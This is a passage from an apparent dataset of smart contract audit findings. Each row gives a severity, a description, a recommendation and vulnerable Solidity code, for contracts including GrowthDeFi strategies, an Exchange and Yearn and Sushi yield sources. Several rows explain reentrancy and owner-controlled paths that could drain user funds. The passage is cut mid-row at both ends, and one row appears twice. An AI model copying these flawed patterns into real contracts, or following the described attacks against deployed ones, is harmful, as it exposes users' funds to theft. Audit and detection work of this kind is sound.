\\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n require(\\_totalBalance >= \\_minRewardAmount, ""high slippage"");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n\\nThe `owner` can change the `exchange` parameter to the malicious address that steals tokens. The `owner` then calls `gulp` with `_minRewardAmount==0`, and all the rewards will be stolen. The same attack can be implemented in fee collectors and the buyback contract.",Resolution\\nThe client communicated this issue was addressed in commit 34c6b355795027d27ae6add7360e61eb6b01b91b.\\nUse a timelock to avoid instant changes of the parameters.,,```\\nuint256 constant MAXIMUM\\_DEPOSIT\\_FEE = 5e16; // 5%\\nuint256 constant DEFAULT\\_DEPOSIT\\_FEE = 0e16; // 0%\\n \\nuint256 constant MAXIMUM\\_PERFORMANCE\\_FEE = 50e16; // 50%\\nuint256 constant DEFAULT\\_PERFORMANCE\\_FEE = 10e16; // 10%\\n```\\n +Expected amounts of tokens in the withdraw function,medium,"Every `withdraw` function in the strategy contracts is calculating the expected amount of the returned tokens before withdrawing them:\\n```\\nfunction withdraw(uint256 \\_shares, uint256 \\_minAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n address \\_from = msg.sender;\\n (uint256 \\_amount, uint256 \\_withdrawalAmount, uint256 \\_netAmount) = \\_calcAmountFromShares(\\_shares);\\n require(\\_netAmount >= \\_minAmount, ""high slippage"");\\n \\_burn(\\_from, \\_shares);\\n \\_withdraw(\\_amount);\\n Transfers.\\_pushFunds(reserveToken, \\_from, \\_withdrawalAmount);\\n}\\n```\\n\\nAfter that, the contract is trying to transfer this pre-calculated amount to the `msg.sender`. It is never checked whether the intended amount was actually transferred to the strategy contract. If the amount is lower, that may result in reverting the `withdraw` function all the time and locking up tokens.\\nEven though we did not find any specific case of returning a different amount of tokens, it is still a good idea to handle this situation to minimize relying on the security of the external contracts.","Resolution\\nClient's statement : “This issue did not really need fixing. The mitigation was already in place by depositing a tiny amount of the reserve into the contract, if necessary”\\nThere are a few options how to mitigate the issue:\\nDouble-check the balance difference before and after the MasterChef's `withdraw` function is called.\\nHandle this situation in the emergency mode (https://github.com/ConsenSys/growthdefi-audit-2021-06/issues/11).",,"```\\nfunction withdraw(uint256 \\_shares, uint256 \\_minAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n address \\_from = msg.sender;\\n (uint256 \\_amount, uint256 \\_withdrawalAmount, uint256 \\_netAmount) = \\_calcAmountFromShares(\\_shares);\\n require(\\_netAmount >= \\_minAmount, ""high slippage"");\\n \\_burn(\\_from, \\_shares);\\n \\_withdraw(\\_amount);\\n Transfers.\\_pushFunds(reserveToken, \\_from, \\_withdrawalAmount);\\n}\\n```\\n" +The capping mechanism for Panther token leads to increased fees,medium,"Panther token has a cap in transfer sizes, so any transfer in the contract is limited beforehand:\\n```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n uint256 \\_\\_totalReward = Transfers.\\_getBalance(rewardToken);\\n (uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n Transfers.\\_pushFunds(rewardToken, buyback, \\_feeReward);\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n \\_totalReward = \\_capTransferAmount(rewardToken, \\_totalReward, \\_retainedReward);\\n Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalRouting = Transfers.\\_getBalance(routingToken);\\n \\_totalRouting = \\_capTransferAmount(routingToken, \\_totalRouting, \\_retainedReward);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n \\_totalBalance = \\_capTransferAmount(reserveToken, \\_totalBalance, \\_retainedReward);\\n require(\\_totalBalance >= \\_minRewardAmount, ""high slippage"");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n\\nFees here are calculated from the full amount of rewards (__totalReward ):\\n```\\n(uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n```\\n\\nBut in fact, if the amount of the rewards is too big, it will be capped, and the residuals will be “taxed” again during the next call of the `gulp` function. That behavior leads to multiple taxations of the same tokens, which means increased fees.",Resolution\\nThe client communicated this issue was addressed in commit 34c6b355795027d27ae6add7360e61eb6b01b91b.\\nThe best solution would be to cap `__totalReward` first and then calculate fees from the capped value.,,"```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n uint256 \\_\\_totalReward = Transfers.\\_getBalance(rewardToken);\\n (uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n Transfers.\\_pushFunds(rewardToken, buyback, \\_feeReward);\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n \\_totalReward = \\_capTransferAmount(rewardToken, \\_totalReward, \\_retainedReward);\\n Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalRouting = Transfers.\\_getBalance(routingToken);\\n \\_totalRouting = \\_capTransferAmount(routingToken, \\_totalRouting, \\_retainedReward);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n \\_totalBalance = \\_capTransferAmount(reserveToken, \\_totalBalance, \\_retainedReward);\\n require(\\_totalBalance >= \\_minRewardAmount, ""high slippage"");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n" +The _capFeeAmount function is not working as intended,medium,"Panther token has a limit on the transfer size. Because of that, all the Panther transfer values in the `PantherSwapCompoundingStrategyToken` are also capped beforehand. The following function is called to cap the size of fees:\\n```\\nfunction \\_capFeeAmount(uint256 \\_amount) internal view returns (uint256 \\_capped, uint256 \\_retained)\\n{\\n \\_retained = 0;\\n uint256 \\_limit = \\_calcMaxRewardTransferAmount();\\n if (\\_amount > \\_limit) {\\n \\_amount = \\_limit;\\n \\_retained = \\_amount.sub(\\_limit);\\n }\\n return (\\_amount, \\_retained);\\n}\\n```\\n\\nThis function should return the capped amount and the amount of retained tokens. But because the `_amount` is changed before calculating the `_retained`, the retained amount will always be 0.",Calculate the `retained` value before changing the `amount`.,,"```\\nfunction \\_capFeeAmount(uint256 \\_amount) internal view returns (uint256 \\_capped, uint256 \\_retained)\\n{\\n \\_retained = 0;\\n uint256 \\_limit = \\_calcMaxRewardTransferAmount();\\n if (\\_amount > \\_limit) {\\n \\_amount = \\_limit;\\n \\_retained = \\_amount.sub(\\_limit);\\n }\\n return (\\_amount, \\_retained);\\n}\\n```\\n" +Stale split ratios in UniversalBuyback,medium,"The `gulp` and `pendingBurning` functions of the `UniversalBuyback` contract use the hardcoded, constant values of `DEFAULT_REWARD_BUYBACK1_SHARE` and `DEFAULT_REWARD_BUYBACK2_SHARE` to determine the ratio the trade value is split with.\\nConsequently, any call to `setRewardSplit` to set a new ratio will be ineffective but still result in a `ChangeRewardSplit` event being emitted. This event can deceive system operators and users as it does not reflect the correct values of the contract.\\n```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\n\\n```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\n","Instead of the default values, `rewardBuyback1Share` and `rewardBuyback2Share` should be used.",,```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\n +Exchange owner might steal users' funds using reentrancy,medium,"The practice of pulling funds from a user (by using safeTransferFrom) and then later pushing (some) of the funds back to the user occurs in various places in the `Exchange` contract. In case one of the used token contracts (or one of its dependent calls) externally calls the `Exchange` owner, the owner may utilize that to call back `Exchange.recoverLostFunds` and drain (some) user funds.\\n```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n\\n```\\nfunction joinPoolFromInput(address \\_pool, address \\_token, uint256 \\_inputAmount, uint256 \\_minOutputShares) external override returns (uint256 \\_outputShares)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_token, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_token)); // deals with potential transfer tax\\n \\_outputShares = UniswapV2LiquidityPoolAbstraction.\\_joinPoolFromInput(router, \\_pool, \\_token, \\_inputAmount, \\_minOutputShares);\\n \\_outputShares = Math.\\_min(\\_outputShares, Transfers.\\_getBalance(\\_pool)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_pool, \\_sender, \\_outputShares);\\n return \\_outputShares;\\n}\\n```\\n\\n```\\nfunction convertFundsFromOutput(address \\_from, address \\_to, uint256 \\_outputAmount, uint256 \\_maxInputAmount) external override returns (uint256 \\_inputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_maxInputAmount);\\n \\_maxInputAmount = Math.\\_min(\\_maxInputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_inputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromOutput(router, \\_from, \\_to, \\_outputAmount, \\_maxInputAmount);\\n uint256 \\_refundAmount = \\_maxInputAmount - \\_inputAmount;\\n \\_refundAmount = Math.\\_min(\\_refundAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_from, \\_sender, \\_refundAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_inputAmount;\\n}\\n```\\n\\n```\\nfunction recoverLostFunds(address \\_token) external onlyOwner\\n{\\n uint256 \\_balance = Transfers.\\_getBalance(\\_token);\\n Transfers.\\_pushFunds(\\_token, treasury, \\_balance);\\n}\\n```\\n","Reentrancy guard protection should be added to `Exchange.convertFundsFromInput`, `Exchange.convertFundsFromOutput`, `Exchange.joinPoolFromInput`, `Exchange.recoverLostFunds` at least, and in general to all public/external functions since gas price considerations are less relevant for contracts deployed on BSC.",,"```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n" +Exchange owner might steal users' funds using reentrancy,medium,"The practice of pulling funds from a user (by using safeTransferFrom) and then later pushing (some) of the funds back to the user occurs in various places in the `Exchange` contract. In case one of the used token contracts (or one of its dependent calls) externally calls the `Exchange` owner, the owner may utilize that to call back `Exchange.recoverLostFunds` and drain (some) user funds.\\n```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n\\n```\\nfunction joinPoolFromInput(address \\_pool, address \\_token, uint256 \\_inputAmount, uint256 \\_minOutputShares) external override returns (uint256 \\_outputShares)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_token, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_token)); // deals with potential transfer tax\\n \\_outputShares = UniswapV2LiquidityPoolAbstraction.\\_joinPoolFromInput(router, \\_pool, \\_token, \\_inputAmount, \\_minOutputShares);\\n \\_outputShares = Math.\\_min(\\_outputShares, Transfers.\\_getBalance(\\_pool)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_pool, \\_sender, \\_outputShares);\\n return \\_outputShares;\\n}\\n```\\n\\n```\\nfunction convertFundsFromOutput(address \\_from, address \\_to, uint256 \\_outputAmount, uint256 \\_maxInputAmount) external override returns (uint256 \\_inputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_maxInputAmount);\\n \\_maxInputAmount = Math.\\_min(\\_maxInputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_inputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromOutput(router, \\_from, \\_to, \\_outputAmount, \\_maxInputAmount);\\n uint256 \\_refundAmount = \\_maxInputAmount - \\_inputAmount;\\n \\_refundAmount = Math.\\_min(\\_refundAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_from, \\_sender, \\_refundAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_inputAmount;\\n}\\n```\\n\\n```\\nfunction recoverLostFunds(address \\_token) external onlyOwner\\n{\\n uint256 \\_balance = Transfers.\\_getBalance(\\_token);\\n Transfers.\\_pushFunds(\\_token, treasury, \\_balance);\\n}\\n```\\n","Reentrancy guard protection should be added to `Exchange.convertFundsFromInput`, `Exchange.convertFundsFromOutput`, `Exchange.joinPoolFromInput`, `Exchange.recoverLostFunds` at least, and in general to all public/external functions since gas price considerations are less relevant for contracts deployed on BSC.",,"```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n" +Yearn: Re-entrancy attack during deposit,high,"During the deposit in the `supplyTokenTo` function, the token transfer is happening after the shares are minted and before tokens are deposited to the yearn vault:\\n```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\n\\nIf the token allows the re-entrancy (e.g., ERC-777), the attacker can do one more transaction during the token transfer and call the `supplyTokenTo` function again. This second call will be done with already modified shares from the first deposit but non-modified token balances. That will lead to an increased amount of shares minted during the `supplyTokenTo`. By using that technique, it's possible to steal funds from other users of the contract.",Have the re-entrancy guard on all the external functions.,,"```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\n" +Yearn: Partial deposits are not processed properly,high,"The deposit is usually made with all the token balance of the contract:\\n```\\n// this will deposit full balance (for cases like not enough room in Vault)\\nreturn v.deposit();\\n```\\n\\nThe Yearn vault contract has a limit of how many tokens can be deposited there. If the deposit hits the limit, only part of the tokens is deposited (not to exceed the limit). That case is not handled properly, the shares are minted as if all the tokens are accepted, and the “change” is not transferred back to the caller:\\n```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\n",Handle the edge cases properly.,,```\\n// this will deposit full balance (for cases like not enough room in Vault)\\nreturn v.deposit();\\n```\\n +Sushi: redeemToken redeems less than it should,medium,"The `redeemToken` function takes as argument the amount of SUSHI to redeem. Because the SushiBar's `leave` function - which has to be called to achieve this goal - takes an amount of xSUSHI that is to be burned in exchange for SUSHI, `redeemToken` has to compute the amount of xSUSHI that will result in a return of as many SUSHI tokens as were requested.\\n```\\n/// @notice Redeems tokens from the yield source from the msg.sender, it burn yield bearing tokens and return token to the sender.\\n/// @param amount The amount of `token()` to withdraw. Denominated in `token()` as above.\\n/// @return The actual amount of tokens that were redeemed.\\nfunction redeemToken(uint256 amount) public override returns (uint256) {\\n ISushiBar bar = ISushiBar(sushiBar);\\n ISushi sushi = ISushi(sushiAddr);\\n\\n uint256 totalShares = bar.totalSupply();\\n uint256 barSushiBalance = sushi.balanceOf(address(bar));\\n uint256 requiredShares = amount.mul(totalShares).div(barSushiBalance);\\n\\n uint256 barBeforeBalance = bar.balanceOf(address(this));\\n uint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\n bar.leave(requiredShares);\\n\\n uint256 barAfterBalance = bar.balanceOf(address(this));\\n uint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\n uint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\n uint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\n balances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n sushi.transfer(msg.sender, sushiBalanceDiff);\\n return (sushiBalanceDiff);\\n}\\n```\\n\\nBecause the necessary calculations involve division and amounts have to be integral values, it is usually not possible to get the exact amount of SUSHI tokens that were requested. More precisely, let `a` denote the total supply of xSUSHI and `b` the SushiBar's balance of SUSHI at `a` certain point in time. If the SushiBar's `leave` function is supplied with `x` xSUSHI, then it will transfer floor(x * `b` / a) SUSHI. (We assume throughout this discussion that the numbers involved are small enough such that no overflow occurs and that `a` and `b` are not zero.)\\nHence, if `y` is the amount of SUSHI requested, it would make sense to call `leave` with the biggest number `x` that satisfies floor(x * b / a) <= `y` or the smallest number `x` that satisfies `floor(x * b / a) >= y`. Which of the two is “better” or “correct” needs to be specified, based on the requirements of the caller of `redeemToken`. It seems plausible, though, that the first variant is the one that makes more sense in this context, and the current implementation of `redeemToken` supports this hypothesis. It calls `leave` with `x1 := floor(y * a / b)`, which gives us floor(x1 * b / a) <= `y`. However, `x1` is not necessarily the biggest number that satisfies the relation, so the caller of `redeemToken` might end up with less SUSHI than they could have gotten while still not exceeding `y`.\\nThe correct amount to call `leave` with isx2 := floor((y * a + a - 1) / b) = max { x | floor(x * b / a) <= y }. Since `|x2 - x1| <= 1`, the difference in SUSHI is at most `floor(b / a)`. Nevertheless, even this small difference might subvert fairly reasonable expectations. For example, if someone queries `balanceOfToken` and immediately after that feeds the result into `redeemToken`, they might very well expect to redeem exactly the given amount and not less; it's their current balance, after all. However, that's not always the case with the current implementation.",Calculate `requiredShares` based on the formula above (x2). We also recommend dealing in a clean way with the special cases `totalShares == 0` and `barSushiBalance == 0`.,,"```\\n/// @notice Redeems tokens from the yield source from the msg.sender, it burn yield bearing tokens and return token to the sender.\\n/// @param amount The amount of `token()` to withdraw. Denominated in `token()` as above.\\n/// @return The actual amount of tokens that were redeemed.\\nfunction redeemToken(uint256 amount) public override returns (uint256) {\\n ISushiBar bar = ISushiBar(sushiBar);\\n ISushi sushi = ISushi(sushiAddr);\\n\\n uint256 totalShares = bar.totalSupply();\\n uint256 barSushiBalance = sushi.balanceOf(address(bar));\\n uint256 requiredShares = amount.mul(totalShares).div(barSushiBalance);\\n\\n uint256 barBeforeBalance = bar.balanceOf(address(this));\\n uint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\n bar.leave(requiredShares);\\n\\n uint256 barAfterBalance = bar.balanceOf(address(this));\\n uint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\n uint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\n uint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\n balances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n sushi.transfer(msg.sender, sushiBalanceDiff);\\n return (sushiBalanceDiff);\\n}\\n```\\n" +Sushi: balanceOfToken underestimates balance,medium,"The `balanceOfToken` computation is too pessimistic, i.e., it can underestimate the current balance slightly.\\n```\\n/// @notice Returns the total balance (in asset tokens). This includes the deposits and interest.\\n/// @return The underlying balance of asset tokens\\nfunction balanceOfToken(address addr) public override returns (uint256) {\\n if (balances[addr] == 0) return 0;\\n ISushiBar bar = ISushiBar(sushiBar);\\n\\n uint256 shares = bar.balanceOf(address(this));\\n uint256 totalShares = bar.totalSupply();\\n\\n uint256 sushiBalance =\\n shares.mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(\\n totalShares\\n );\\n uint256 sourceShares = bar.balanceOf(address(this));\\n\\n return (balances[addr].mul(sushiBalance).div(sourceShares));\\n}\\n```\\n\\nFirst, it calculates the amount of SUSHI that “belongs to” the yield source contract (sushiBalance), and then it determines the fraction of that amount that would be owed to the address in question. However, the “belongs to” above is a purely theoretical concept; it never happens that the yield source contract as a whole redeems and then distributes that amount among its shareholders; instead, if a shareholder redeems tokens, their request is passed through to the `SushiBar`. So in reality, there's no reason for this two-step process, and the holder's balance of SUSHI is more accurately computed as `balances[addr].mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(totalShares)`, which can be greater than what `balanceOfToken` currently returns. Note that this is the amount of SUSHI that `addr` could withdraw directly from the `SushiBar`, based on their amount of shares. Observe also that if we sum these numbers up over all holders in the yield source contract, the result is smaller than or equal to `sushiBalance`. So the sum still doesn't exceed what “belongs to” the yield source contract.",The `balanceOfToken` function should use the formula above.,,```\\n/// @notice Returns the total balance (in asset tokens). This includes the deposits and interest.\\n/// @return The underlying balance of asset tokens\\nfunction balanceOfToken(address addr) public override returns (uint256) {\\n if (balances[addr] == 0) return 0;\\n ISushiBar bar = ISushiBar(sushiBar);\\n\\n uint256 shares = bar.balanceOf(address(this));\\n uint256 totalShares = bar.totalSupply();\\n\\n uint256 sushiBalance =\\n shares.mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(\\n totalShares\\n );\\n uint256 sourceShares = bar.balanceOf(address(this));\\n\\n return (balances[addr].mul(sushiBalance).div(sourceShares));\\n}\\n```\\n +Yearn: Redundant approve call,low,"The approval for token transfer is done in the following way:\\n```\\nif(token.allowance(address(this), address(v)) < token.balanceOf(address(this))) {\\n token.safeApprove(address(v), 0);\\n token.safeApprove(address(v), type(uint256).max);\\n}\\n```\\n\\nSince the approval will be equal to the maximum value, there's no need to make zero-value approval first.",Change two `safeApprove` to one regular `approve` with the maximum value.,,"```\\nif(token.allowance(address(this), address(v)) < token.balanceOf(address(this))) {\\n token.safeApprove(address(v), 0);\\n token.safeApprove(address(v), type(uint256).max);\\n}\\n```\\n" +Sushi: Some state variables should be immutable and have more specific types,low,"The state variables `sushiBar` and `sushiAddr` are initialized in the contract's constructor and never changed afterward.\\n```\\ncontract SushiYieldSource is IYieldSource {\\n using SafeMath for uint256;\\n address public sushiBar;\\n address public sushiAddr;\\n mapping(address => uint256) public balances;\\n\\n constructor(address \\_sushiBar, address \\_sushiAddr) public {\\n sushiBar = \\_sushiBar;\\n sushiAddr = \\_sushiAddr;\\n }\\n```\\n\\nThey should be immutable; that would save some gas and make it clear that they won't (and can't) be changed once the contract has been deployed.\\nMoreover, they would better have more specific interface types than `address`, i.e., `ISushiBar` for `sushiBar` and `ISushi` for `sushiAddr`. That would be safer and make the code more readable.","Make these two state variables `immutable` and change their types as indicated above. Remove the corresponding explicit type conversions in the rest of the contract, and add explicit conversions to type `address` where necessary.",,"```\\ncontract SushiYieldSource is IYieldSource {\\n using SafeMath for uint256;\\n address public sushiBar;\\n address public sushiAddr;\\n mapping(address => uint256) public balances;\\n\\n constructor(address \\_sushiBar, address \\_sushiAddr) public {\\n sushiBar = \\_sushiBar;\\n sushiAddr = \\_sushiAddr;\\n }\\n```\\n" +Sushi: Unnecessary balance queries,low,"In function `redeemToken`, `barBalanceDiff` is always the same as `requiredShares` because the SushiBar's `leave` function burns exactly `requiredShares` xSUSHI.\\n```\\nuint256 barBeforeBalance = bar.balanceOf(address(this));\\nuint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\nbar.leave(requiredShares);\\n\\nuint256 barAfterBalance = bar.balanceOf(address(this));\\nuint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\nuint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\nuint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\nbalances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n```\\n","Use `requiredShares` instead of `barBalanceDiff`, and remove the unnecessary queries and variables.",,```\\nuint256 barBeforeBalance = bar.balanceOf(address(this));\\nuint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\nbar.leave(requiredShares);\\n\\nuint256 barAfterBalance = bar.balanceOf(address(this));\\nuint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\nuint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\nuint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\nbalances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n```\\n +Sushi: Unnecessary function declaration in interface,low,"The `ISushiBar` interface declares a `transfer` function.\\n```\\ninterface ISushiBar {\\n function enter(uint256 \\_amount) external;\\n\\n function leave(uint256 \\_share) external;\\n\\n function totalSupply() external view returns (uint256);\\n\\n function balanceOf(address account) external view returns (uint256);\\n\\n function transfer(address recipient, uint256 amount)\\n external\\n returns (bool);\\n}\\n```\\n\\nHowever, this function is never used, so it could be removed from the interface. Other functions that the `SushiBar` provides but are not used (approve, for example) aren't part of the interface either.",Remove the `transfer` declaration from the `ISushiBar` interface.,,"```\\ninterface ISushiBar {\\n function enter(uint256 \\_amount) external;\\n\\n function leave(uint256 \\_share) external;\\n\\n function totalSupply() external view returns (uint256);\\n\\n function balanceOf(address account) external view returns (uint256);\\n\\n function transfer(address recipient, uint256 amount)\\n external\\n returns (bool);\\n}\\n```\\n" +Simplify the harvest method in each SinglePlus,low,"The `BadgerSBTCCrvPlus` single plus contract implements a custom `harvest` method.\\n```\\n/\\*\\*\\n \\* @dev Harvest additional yield from the investment.\\n \\* Only governance or strategist can call this function.\\n \\*/\\nfunction harvest(address[] calldata \\_tokens, uint256[] calldata 